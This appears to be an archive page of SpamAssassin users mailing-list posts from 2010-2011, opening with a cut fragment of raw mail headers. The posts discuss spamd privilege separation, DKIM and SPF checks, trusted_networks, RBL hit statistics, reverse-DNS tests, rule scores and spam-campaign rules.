use 'emilien.ar...@novacrea.fr' in 'mfrom' identity 
(mechanism 'a:mo1.n*ea.fr' matched)) receiver=r13151.ovh.net; 
identity=mailfrom; envelope-from=emilien.arino@na.fr; 
helo=mo1.novacrea.fr; client-ip=46.105.7.81
X-SenderID: Sendmail Sender-ID Filter v1.0.0 r13151.ovh.net BA7B9CC0AE
Authentication-Results: r13151.ovh.net; sender-id=pass 
header.from=emilien.arino@na.fr; spf=pass 
smtp.mfrom=emilien.ar...@nrea.fr
X-Greylist: delayed 515 seconds by postgrey-1.34 at r13151.ovh.net; Tue, 06 
Sep 2011 14:11:32 CEST
X-My-Organisation: fakessh @
Received: from mo1.n***crea.fr (mo1.no*a.fr [46.105.7.81])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(Client did not present a certificate)
by r13151.ovh.net (Postfix) with ESMTPS id BA7B9CC0AE
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:28 +0200 (CEST)
Received: from mo1.ncrea.fr (localhost.localdomain [127.0.0.1])
by mo1.no*a.fr (Postfix) with ESMTP id 84F52A202
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:02:06 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=novacrea.fr; h=me

the result of exam to pass
and sometimes different depending on the technology
-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7


pgpbb3KF6cicP.pgp
Description: PGP signature

Re: Securing spamd [single (non root) OS user]

[m...@smtp.fakessh.eu]

Le vendredi 8 juillet 2011 19:00, Andrzej Adam Filip a écrit :
 Kārlis Repsons karlis.reps...@gmail.com wrote:
  All,
  I'd like you to review approximately how I'm running spamd. My concern
  is security. You can see that the child processes are run by spamd user,
  but the main process is still run by root:
 
  ps -C spamd -o user,cmd
  USER CMD
  root /usr/sbin/spamd -d -r /var/run/spamd.pid -m 2 -u spamd
  --nouser-config --helper-home-dir=/sysram/spamassassin --allow-tell spamd
 spamd child
  spamdspamd child
 
  How secure is that (no I didn't make any crazed chroots or so) and what
  would you suggest to isolate spamd from possible outside intrusions?
  Thanks...

 Do you need spamd changing OS user ids? (e.g. to access ~/.spamassassin/ )

 I have used personal [single (non root) OS user] spamd without any
 problems.

e.g in my system 
folder .spamassassin is owned by  group users
r13151 ~]# ls -al /home/fakessh/.spamassassin/
total 44
drwx--  2 fakessh users  4096 jui  6 20:31 .
drwxr-xr-x 19 fakessh users  4096 jui  6 01:38 ..
-rw---  1 fakessh users 12288 jui  6 00:17 auto-whitelist
-rw---  1 fakessh users 12288 jui  6 00:16 bayes_seen
-rw---  1 fakessh users 12288 jui  6 20:31 bayes_toks
-rw---  1 fakessh users  1869 jui  5 23:54 user_prefs

-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7


pgpE7ebXFb5lz.pgp
Description: PGP signature

anti virus EICAR file is not detected by the couple clamd amavisd

[m...@smtp.fakessh.eu]

hi folks

in my station
anti virus EICAR file is not detected by the couple clamd amavisd


all testimonials are welcome
-- 
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x092164A7
 gpg --keyserver pgp.mit.edu --recv-key 092164A7


pgpiBHw6zHTrd.pgp
Description: PGP signature

RE: DKIM Checks

[Rosenbaum, Larry M.]

 From: Matt [mailto:lm7...@gmail.com]
 Sent: Wednesday, May 18, 2011 11:32 AM
 To: users
 Subject: DKIM Checks
 
 I am running spamassassin-3.2.5-1.el5 on 64 bit CentOS.
 
 sa-update -D seems to indicate that the DKIM libraries are installed.
 ... 
 May 18 10:25:02.683 [15134] dbg: diag: [...] module installed:
 Mail::DKIM, version 0.39
 ...
 Looking at the X-Spam-Report on various messages and I never see that
 its looked at.  I see that SPF is checked and scored.  Any idea why
 its not checking the DKIM signatures?

Check the file v312.pre and see if the loadplugin line for DKIM is commented 
out.  If it is, uncomment it.

whitelist ip in trusted network

[Rajesh M]

hi

i wish to whitelist a few client's server's static ip in the spamassasin
trusted network

i am entering a line like this in local.cf file.

trusted_networks xxx.yyy.zzz.ppp

if i do this then the email from this server ip should be given a negative
score but it does not seem to work

spamassassin does not work for any ip that i put here, even those ips of
my other servers are not trusted. It seems that spamassassin is simply not
even looking at the trusted network ips ie it is disabled due to some
reason

could you please help.

rajesh

Re: whitelist ip in trusted network

[Rajesh M]

 On 05/07, Rajesh M wrote:
 trusted_networks xxx.yyy.zzz.ppp

 if i do this then the email from this server ip should be given a
 negative
 score but it does not seem to work

 That's not what trusted_networks does.  It skips the Received header from
 those IPs for things like DNS blacklist lookups.

 --
 It's never too late to panic.
 http://www.ChaosReigns.com



hi

thanks for your quick reply.

could you please let me how i can whitelist specific servers belonging to
my clients from whom i have to receive email perfectly without ever being
treated as spam

rajesh

Re: new gappy domain campaign (w/sample)

[Chip M.]

mouss wrote:
with a stock config, and without Bayes, it now yields: 

Hmmm, interesting!

Yes, all the caught spam here were due to RBL hits.

Which begs the question, what SpamAssassin tests are hitting for 
the misses vs the kills?

Here's what hit (here), for the first 38 missed spams:
  Test  Count
FH_HELO_EQ_D_D_D_D 2
FSL_HELO_DEVICE1
FSL_HELO_NON_FQDN_11
HELO_DYNAMIC_HCC   2
HELO_DYNAMIC_IPADDR2   1
HELO_NO_DOMAIN 1
RCVD_IN_BL_SPAMCOP_NET13
RCVD_IN_BRBL_LASTEXT   2
RCVD_IN_PBL2 *
RDNS_DYNAMIC   3
RDNS_NONE  1

Here's what hit for the first 26 caught spams:
  Test  Count
AXB_HELO_HOME_UN   1
DATE_IN_FUTURE_Q_PLUS  1
FH_HELO_EQ_D_D_D_D12
FSL_HELO_DEVICE1
FSL_HELO_NON_FQDN_18
HELO_DYNAMIC_DHCP  3
HELO_DYNAMIC_IPADDR9
HELO_DYNAMIC_IPADDR2   5
HELO_DYNAMIC_SPLIT_IP  1
HELO_LH_HOME   1
HELO_NO_DOMAIN 8
RCVD_IN_BRBL_LASTEXT  22
RCVD_IN_PBL   25 *
RCVD_IN_PSBL   1
RCVD_IN_SORBS_DUL  3
RCVD_IN_XBL1
RDNS_DYNAMIC  16
RDNS_NONE 10

The contrast in PBL hits is interesting.
I wonder if RBLs list more aggressively if the IP is already on PBL?
Just a casual thought/question. :)


here, it gets BAYES_99 as well. 

Is that based on feeding any of these to your Bayes?

I just checked my latest samples, and they're still identical, 
body-wise, so feeding should be extremely effective.

I forgot to mention that these are hitting a few dictionary 
accounts which only receive spam from our old nemesis, the clever
wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
these to morph, real soon. :\

In the past, that guy's campaigns have had a similarly low hit 
rate on PBL.  I've always wondered how he/they achieve that.
- Chip

Re: My attempt at re-calculating test scores

[m]

Hi,

Is this corpora available for public use (e.g using the corpora for their 
testings)? 

All I know is that SA has an old public corpora that dates back in 2005.

(Sending from BB)

---
Mahmoud Khonji

-Original Message-
From: Warren Togami Jr. wtog...@gmail.com
Date: Thu, 23 Dec 2010 12:45:14 
To: dar...@chaosreigns.com
Cc: users@spamassassin.apache.org
Subject: Re: My attempt at re-calculating test scores

BTW, if you have your own corpora, why not participate in the nightly
masscheck?  We are in serious need of additional participants in order to
enable promotion of new rules to the sa-update channel, and to make it
possible to release new versions of spamassassin.

Warren

RE: Fake MX

[Rosenbaum, Larry M.]

 From: Bob Proulx [mailto:b...@proulx.com]
 Subject: Re: Fake MX
 
   [...] but that is distinct from being a tarpit, which is what
   I'm trying to clarify.
 
  A discussion around the definition of tarpit, and why tarbaby might be a
  suboptimal, though catchy, name?
 
 For the record a tarbaby:
 
   http://en.wikipedia.org/wiki/Tar_baby
 
 is something different from a tarpit:
 
   http://en.wikipedia.org/wiki/Tarpit_%28networking%29
 
 Please, let's use the correct terminology.  They really are pretty far
 from being interchangeable.

I wonder if the OP was really referring to a honeypot?

RE: email address forgery

[Rosenbaum, Larry M.]

Are there domains that have actually defined SPF record type records?  I 
haven’t been able to find any, but it could be the fault of the tools I’m using.

L

From: Noel Butler [mailto:noel.but...@ausics.net]
Sent: Thursday, November 11, 2010 5:14 PM
To: users@spamassassin.apache.org
Subject: Re: email address forgery

On Thu, 2010-11-11 at 10:07 -0500, Rob McEwen wrote:



On 11/11/2010 9:11 AM, Jeremy Van Rooyen wrote:

 Can anybody explain to me how to do this and how would I be able to

 test it?



Jeremy,



I really like to use the following wizard to generate my SPF strings:



http://www.openspf.org/



Scroll down to the section that says Deploying SPF, enter the domain

name, and click GO. Then, on the next page, fine tune the answers to

the various questions before submitting the info to generate your SPF

string. Finally, go into your DNS server and, for that domain, add that

string as a TXT record.



*and* as an  SPF  record type, the TXT method is deprecated, but for time being 
it's good to use it since there are a lot, and I mean a  LOT of outdated DNS 
servers around that do not support it even today, yes, the fault of the DNS 
server admin for running antiquated rubbish, but, there's just no telling some 
people to get with the times.

Re: Full circle DNS test?

[m]

How do you expect this to handle cases when a single IP address (i.e single 
MTA) is responsible for sending emails for multiple domains. The domain name 
match won't happen for all.

That's why we have SPF, SenderID (MS didn't want to feel left out, and DKIM 
(RFC standard).

As far as reverse lookup goes, AOL requires MTAs to have a reverse PTR zone in 
a form of FQDN, but doesn't mandate exact match of the domain found in MAIL 
FROM in SMTP header. Which is less restricted than your sugge stion.

BTW, back in dark ages, there were discussions in RFC mailing lists of similar 
approaches like yours but got rejected. Paul Vixie had his own suggestions too.


--Original Message--
From: dar...@chaosreigns.com
To: users@spamassassin.apache.org
Subject: Full circle DNS test?
Sent: Oct 30, 2010 6:02 AM

I see there's a RDNS_NONE rule for when the sending IP address has no DNS
PTR (reverse DNS) record.  But no rule for when that PTR record doesn't
have a matching A (forward DNS) record that matches the sending IP?

For example, if you get an email from me, and look up the IP:

  64.71.152.40 - chaosreigns.com

Then you can look up that host name and get:

  chaosreigns.com - 64.71.152.40

And if that IP didn't match the sending IP, it would fail this test.

Is this something that would be accepted into spamassassin if I created a
module?  Or a feature that would be added if I didn't do it?

I block all email that doesn't pass this test at my MTA (postfix
reject_unknown_client_hostname), but I understand some people don't.

-- 
It's a dangerous business, Frodo, going out your front door. You step
into the Road, and if you don't keep your feet, there is no knowing
where you might be swept off to. - Bilbo Baggins
http://www.ChaosReigns.com



---
Mahmoud Khonji

Re: Full circle DNS test?

[m]

I misread your email then, my bad.

As far as I understand it now, is that you are getting the hostname by reverse 
DNS lookup against the connecting SMTP peer (that is sending a mail).

Then you use that FQDN to for a DNS A RR query. And you expect this IP address 
to match to match against the SMTP peer's IP. This is even worst than my 
initial understanding.

Why would you want a DNS A RR to match an IP that is often founs as MX RR. Are 
you assuming A RR == MX RR? They won't match in many cases.

If you query for an MX DNS RR instead of A RR, it would be less stupid (but is 
still stupid). Paul Vixie's proposal was similar.

Final answer is your practical results. How many FP and TP are you getting? I 
would get crazy high FP in my case.


--Original Message--
From: dar...@chaosreigns.com
To: users@spamassassin.apache.org
Subject: Re: Full circle DNS test?
Sent: Oct 30, 2010 9:26 AM

I never said anything about the domain matching the MAIL FROM.  Or anything
else.  Just that the sending IP have a PTR record which matches an A record
which matches the sending IP.  Any domain.  And, of course, the test would
have false positives, as do most others.  

But as I said, I already block all email at my MTA that doesn't pass it.
Since January 2007, apparently.  So I think it's worth having a test for.

On 10/30, m...@khonji.org wrote:
 How do you expect this to handle cases when a single IP address (i.e single 
 MTA) is responsible for sending emails for multiple domains. The domain name 
 match won't happen for all.
 
 That's why we have SPF, SenderID (MS didn't want to feel left out, and DKIM 
 (RFC standard).
 
 As far as reverse lookup goes, AOL requires MTAs to have a reverse PTR zone 
 in a form of FQDN, but doesn't mandate exact match of the domain found in 
 MAIL FROM in SMTP header. Which is less restricted than your sugge stion.
 
 BTW, back in dark ages, there were discussions in RFC mailing lists of 
 similar approaches like yours but got rejected. Paul Vixie had his own 
 suggestions too.

-- 
There never has been an answer. There never will be an answer.
That's the answer. - Gertrude Stein
http://www.ChaosReigns.com



---
Mahmoud Khonji

Re: Collecting IP reputation data from many people

[m]

I was originally thinking it would be
most informative to provide the
number of spams and non-spams from
each IP over some time period.

Google has a presentation in CEAS (check ceas.cc website) that explained a very 
similar approach to fight SPAM by ranking mail senders. As the presentation 
claimed, google uses it with their email system and works well for them.



---
Mahmoud Khonji

Re: Collecting IP reputation data from many people

[m]

www.ceas.cc/2006/19.pdf


---
Mahmoud Khonji

-Original Message-
From: m...@khonji.org
Date: Fri, 22 Oct 2010 01:03:54 
To: dar...@chaosreigns.com; users@spamassassin.apache.org
Reply-To: m...@khonji.org
Subject: Re: Collecting IP reputation data from many people

I was originally thinking it would be
most informative to provide the
number of spams and non-spams from
each IP over some time period.

Google has a presentation in CEAS (check ceas.cc website) that explained a very 
similar approach to fight SPAM by ranking mail senders. As the presentation 
claimed, google uses it with their email system and works well for them.



---
Mahmoud Khonji

Re: How do I get delisted from SORBS? [OT]

[m]

 It differs because I am saying they *should* remain listed forever.

False positives are far worst than false negatives for businesses. Some 
blacklists do not tolerate a FP of more than 1%.

Blacklists are behind the line as they don't fight zero-hour attacks, and the 
only reason why blacklists are appeasing is really their low FP rate. This is 
why Google made a blacklist to fight phish and malware --- Google wanted FP 
that is well below 1% (0.04% IIRC)

A blacklist with high FP, such as SORBS, is no use. We'd better use heuristics, 
at least we can fight zero hour attacks with = FP rate.

My 0.02.


---
Mahmoud Khonji

Re: Need God/Christian rule sets

[m]

How do you propose to make such relations between the keywords, and how to 
mitigate false positives?

Naïve Bayes deals with words independently. If we want to link between words, I 
think we are into Natural Language Processing (NLP).

If you have any good thoughts please share.


---
Mahmoud Khonji

RE: DOS_OE_TO_MX

[Rosenbaum, Larry M.]

 -Original Message-
 From: njjrdell [mailto:nruggi...@dellmagazines.net]
 Sent: Wednesday, September 29, 2010 11:32 AM
 To: users@spamassassin.apache.org
 Subject: Re: DOS_OE_TO_MX
 
 
 I'm pretty sure she would not send a GTUBE. Here is another from her
 
 Sep 28 08:35:26 nsmail spamd[207]: prefork: child states: II\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: connection from localhost
 [127.0.0.1] at port 50098\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: checking message
 000b01cb5f6e$b1bbfe80$6629a...@traci for (unknown):500\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: identified spam (4006.3/5.0) for
 (unknown):500 in 1.0 seconds, 142218 bytes.\n
 Sep 28 08:35:55 nsmail spamd[287]: spamd: result: Y 4006 -
 AWL,BAYES_50,DATE_IN_FUTURE_12_24,DOS_OE_TO_MX
 scantime=1.0,size=142218,user=(unknown),uid=500,required_score=5.0,rhost=l
 ocalhost,raddr=127.0.0.1,rport=50098,mid=000b01cb5f6e$b1bbfe80$6629a...@t
 raci,bayes=0.483846,autolearn=no\n
 
 
 I never seen anything with such a score of 4006. DOS_OE_TO_MX is the rule
 that is consistent, so I was hoping to find out where it is to make sure
 nothing is scored wrong

score DOS_OE_TO_MX 2.602 3.086 2.265 2.523

RE: DOS_OE_TO_MX

[Rosenbaum, Larry M.]

 From: njjrdell [mailto:nruggi...@dellmagazines.net]
 Sent: Wednesday, September 29, 2010 12:05 PM
 To: users@spamassassin.apache.org
 Subject: RE: DOS_OE_TO_MX
 
 
 also, won't whitelisting her address open her up for spoofing?

AWL has nothing to do with whitelist_from and other similar options.  It's more 
of a score averager.
http://wiki.apache.org/spamassassin/AutoWhitelist

 thanks for the scores. Now would that just go into
 /usr/local/share/spamassassin/50_scores.cf?
 and why would that score be missing.

It's not missing.  It is in
/var/lib/spamassassin/3.003001/updates_spamassassin_org/50_scores.cf
or some similar directory. To find your config directory path, try this:

spamassassin -D config --lint


 
 Rosenbaum, Larry M. wrote:
 
 
 
  -Original Message-
  From: njjrdell [mailto:nruggi...@dellmagazines.net]
  Sent: Wednesday, September 29, 2010 11:32 AM
  To: users@spamassassin.apache.org
  Subject: Re: DOS_OE_TO_MX
 
 
  I'm pretty sure she would not send a GTUBE. Here is another from her
 
  Sep 28 08:35:26 nsmail spamd[207]: prefork: child states: II\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: connection from localhost
  [127.0.0.1] at port 50098\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: checking message
  000b01cb5f6e$b1bbfe80$6629a...@traci for (unknown):500\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: identified spam (4006.3/5.0)
  for
  (unknown):500 in 1.0 seconds, 142218 bytes.\n
  Sep 28 08:35:55 nsmail spamd[287]: spamd: result: Y 4006 -
  AWL,BAYES_50,DATE_IN_FUTURE_12_24,DOS_OE_TO_MX
 
 scantime=1.0,size=142218,user=(unknown),uid=500,required_score=5.0,rhost=l
 
 ocalhost,raddr=127.0.0.1,rport=50098,mid=000b01cb5f6e$b1bbfe80$6629a...@t
  raci,bayes=0.483846,autolearn=no\n
 
 
  I never seen anything with such a score of 4006. DOS_OE_TO_MX is the
 rule
  that is consistent, so I was hoping to find out where it is to make
 sure
  nothing is scored wrong
 
  score DOS_OE_TO_MX 2.602 3.086 2.265 2.523
 
 
 
 
 --
 View this message in context: http://old.nabble.com/DOS_OE_TO_MX-
 tp29839497p29840133.html
 Sent from the SpamAssassin - Users mailing list archive at Nabble.com.

Re: New plugin: DecodeShortURLs

[Chip M.]

Steve Freegard wrote:
Hopefully it will be useful to others; you can grab it from:

Thanks Steve!

Suggestions (for future enhancements):

1. Consider splitting the list of shorteners between those that
are well established and KNOWN to be reasonably diligent, and
all others (e.g. the anti-pattern ably described last week in:
http://www.xkcd.com/792/ ).
Split them in such a way as to make it easy for users to test only
ONE set (probably the better known ones), and (perhaps) add an
option to score the rest without doing a DNS call.

2. Investigate BitLy's API.
I've been experimenting with it for a few months, and am very
pleased with the options and data it provides.  I still need to add
ham shortener links to my standard/automated testing (preliminary
results are excellent).
The only issue I had (at the very beginning) was signing up with
a mixed case API key, then lower casing it when I used it.  My BIM.

3. Please collect and share performance data.  Thanks in advance! :)


I still haven't deployed anything real-time (have had VERY limited
quality-dev-time this year - Grrr!Argh!).  Since these first became
a problem, I've been auto-quarantining (except for a very short list
of manually excluded newsletters and select validated Senders), then
we handle the DNS tests as part of our desktop-based FP pipeline.

The occurrence of shorteners in ham is low enough that that's been
acceptable to our userbase, largely because they run the actual
tests, so they have Complete Control.  It's been my experience that
not-stupid endusers who are given control are happy users.  They're
full participants in the process. :)
- Chip

Re: Yahoo HTML Base64 Attachments

[Chip M.]

On 19 Sep 2010, John Hardin wrote:
 Adding to my sandbox for masscheck: 
 
 rawbody HTML_OBFU_ESC /document\.write\(unescape\((?:%[0-9a-f]{2}){10}/i 

It performs pretty well. It should be in the next rules update, under a 
slightly different name (OBFU_JVSCR_ESC). 

Shiny!

How about combining/meta-ing that with a simple Base64 HTML rule?
I vaguely recall you may already have one (Base64 rule, not (yet) a
meta).

Based on my ham data, that pairing seems extraordinarily rare.

I just checked all 2010 data for my most diverse domain (three
generations of an extended family, with a superb mix of business
plus personal ham), and found only 58 (out of 66,795) hams with
Base64 HTML.
Of those, ZERO hit any of my anti-script tests, however 49 of them
did have an existing non-trivial pass rule that skips some of those
anti-script tests (in other words, those were already well known
(to us) for their poor mailing hygiene).

I just dumped the Content Type summary lines for all 58, and if
you're interested, John, I can email them as a zip.  Just eyeballing
them, there appears to be some interesting differences in the
filename distribution vs this spam campaign.

I checked a similar quantity of data for a pure business domain, and
found ZERO occurrences of Base64 HTML.

As is often the case, choosing tests and scores depends on one's ham
ecology.


Today: Talk Like a Pirate day

... and Today: Talk Like a Browncoat Day
i.e. the 8th anniversary of the TV broadcast debut of Firefly. :)

Keep flyin',
- Chip

application/octet-stream obfuscated JPEGs

[Chip M.]

There's a new morph from our old nuisance, the inline PNG/RTF, and
all manner of wavy image insecure-boy-drugs spammer. :(

Here's a sample:
http://puffin.net/software/spam/samples/0009_jpg_oct.txt

It began (here) on Sep 10, and replaced his (relatively boring)
Your wife photos attached zipped JPEG.

This time, it has two parts.  The first is plain text, with his
often seen before anti-Bayes chunk of text from a copyright expired
book.

The second part is a new-ish spin:
an image using application/octet-stream as the Content Type, but
otherwise sanely constructed (i.e. it has a full filename with
.jpg, which is the ACTUAL image encoding used, unlike some of his
previous morphs).

Sadly, I've seen this particular stupid-spammer-trick before...
in ham. :(  It's rare enough, and the senders broken enough, that
some may feel comfortable penalizing this pattern (maybe a simple
test of app/oct with an image file extension?).  On the other hand,
a significant percentage of the broken mailing lists that use this,
do tend to have high value with their recipients.  A cautious score
is advisable.

On a bright note, it does have the exact same JPEG header size that
I've previously reported (623 bytes).  It also continues this
spammer's use of random (ALWAYS wrong) Realnames in the To header.
Those two tests, plus nation of origin, are my main test hits.
So far, none have snuck thru my last layers of defense.
- Chip